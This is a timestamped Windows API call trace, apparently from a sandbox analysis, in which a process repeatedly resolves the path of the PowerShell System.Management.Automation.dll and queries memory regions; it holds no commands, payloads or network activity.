	[0094.412] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.413] CoCreateGuid (in: pguid=0x16d710 | out: pguid=0x16d710*(Data1=0x3057a793, Data2=0x87b2, Data3=0x4fec, Data4=([0]=0x8b, [1]=0xff, [2]=0xf0, [3]=0xb3, [4]=0x56, [5]=0xab, [6]=0x5c, [7]=0x7))) returned 0x0
	[0094.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.413] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.414] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cb00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.415] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.416] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.416] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.416] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.417] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.417] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.417] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.418] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.418] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.418] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.419] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.419] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.419] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.420] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.420] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.420] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.421] VirtualQuery (in: lpAddress=0x16b590, lpBuffer=0x16c450, dwLength=0x30 | out: lpBuffer=0x16c450*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.421] VirtualQuery (in: lpAddress=0x16b620, lpBuffer=0x16c4e0, dwLength=0x30 | out: lpBuffer=0x16c4e0*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0094.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bd50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16bca0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16ca20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0094.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16cbb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
